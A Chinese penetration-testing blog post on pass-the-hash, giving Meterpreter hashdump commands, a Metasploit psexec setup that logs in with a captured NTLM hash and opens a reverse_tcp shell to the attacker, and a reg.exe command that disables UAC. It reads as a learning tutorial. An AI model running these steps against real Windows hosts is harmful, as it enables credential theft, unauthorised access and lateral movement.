User-Profile-Image
hankin
  • 5
请到[后台->外观->菜单]中设置菜单。
  • 分类
    • 靶机渗透
    • 计算机小技巧
    • 漏洞复现
    • 未分类
    • 数据结构
    • 内网渗透
    • 代码审计
    • XSS
    • WEB安全漏洞学习
    • Web
    • python
    • PHP
    • NodeJS
    • MYSQL
    • Misc
    • JavaScript
    • Docker
    • CTF相关知识点
    • CTFWP
    • Crypto
    • Cobalt Strike
  • 页面
  • 友链
    • 三哥的博客
    • Root师傅的博客
    • EDS师傅的博客
    • 天正哥的博客
    • 天尘翼师傅的博客
    • 熵增师傅的github
    • 信仰的博客
    • Jadore的博客
Help?

Please contact us on our email for need any support

Support
    首页   ›   内网渗透   ›   正文
内网渗透

哈希传递

2020-04-02 16:12:02
106  0 0

Hash基础知识:

Windows系统下的hash密码格式为:用户名称:RID:LM-HASH值:NT-HASH值

获取Hash值:

hashdump(systen权限)

meterpreter >run post/windows/gather/hashdump(system权限)

meterpreter > run post/windows/gather/smart_hashdump(system权限)

检查权限和系统类型
检查是否是域控制服务器
从注册表读取hash、注入Lsass进程
如果是08server并具有管埋员权限,直接getsystem尝试提权
如果是win7且UAC关闭并具有管理员权限,从注册表读取
03/XP直接getsystem,从注册表获取hash

其中在通过提权后获得的session(如bypassuac),不进行getsystem的时候getuid查看的仍是管理员权限,但实际已经提到了system权限,这种情况不进行彻底转换也可以运行hashdump了

拿到Hash值后第一种方法进行解密,可利用在线网站http://cmd5.com等,如果是使用CS拿下的运行mimikatz也有可能获取到明文。当无法获取到明文时考虑哈希传递

哈希传递

psexe有MSF,CobaltStrike和exe版本。

使用psexec前提需要目标机器开启445端口,可先进行一个端口扫描

创建/执行远程命令代码。
执行远程进程的前提条件是对方机器必须开启ipc,以及admin,否则无法执行。下面我们来看详细命令:
开启ipc$
net share ipc$
开启admin$
net share admin$

msf5 >use exploit/windows/smb/psexec

msf5 exploit(psexec)> set rhost 目标机IP

msf5 exploit(psexec)> set smbuser root(hashdump下来的)

msf5 exploit(psexec)> set smbpass aad3b435b51404eeaad3b435b51404ee:afc44ee351d61d00698796da06blebf(获取到的hash值)

msf5 exploit(psexec)> set payload windows/meterpreter/reverse_tcp

msf5 exploit(psexec)> set lhost kaliIP

msf5 exploit(psexec)> set port 3333

如果目标机器开启UAC,需要通过获得的meterpreter权限通过修改目标机注册表信息关闭掉UAC

可以使用 reg add /?查询帮助使用信息

下面是对注册表中UAC控制改为0(关闭UAC)

reg.exe ADD HKEY_LOCAL MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /V EnableLUA /t REG DWORD /d 0 /f

ADD 后是注册表信息,/v 是值名 /d

关闭后需要进行重启才会生效 ,可以通过一些攻击手法进行重启。再次获得shell执行psexec的横向移动。前一篇的ATT&CK(一)中的横向移动也可以尝试使用这种方式进行。

评论 (0)

点击这里取消回复。

欢迎您 游客  

近期文章
  • 免杀QuasarRAT
  • 密码保护:python反序列化免杀上线CS
  • Hgame2021
  • Shiro反序列化漏洞复现
  • 密码保护:2020祥云杯决赛AWD赛题复盘
近期评论
    文章归档
    • 2021年2月
    • 2021年1月
    • 2020年12月
    • 2020年11月
    • 2020年9月
    • 2020年7月
    • 2020年6月
    • 2020年5月
    • 2020年4月
    • 2020年3月
    • 2020年2月
    • 2020年1月
    分类目录
    • Cobalt Strike
    • Crypto
    • CTFWP
    • CTF相关知识点
    • Docker
    • JavaScript
    • Misc
    • MYSQL
    • NodeJS
    • PHP
    • python
    • Web
    • WEB安全漏洞学习
    • XSS
    • 代码审计
    • 内网渗透
    • 数据结构
    • 未分类
    • 漏洞复现
    • 计算机小技巧
    • 靶机渗透
    功能
    • 登录
    • 条目feed
    • 评论feed
    • WordPress.org
    分类目录
    Copyright © 2021 网站备案号: 蒙ICP备20000552号-1
    smarty_hankin 主题. Designed by hankin
    主页
    页面
    博主
    purplet 管理员
    努力并有所方向
    167 文章 0 评论 34738 浏览
    测试
    测试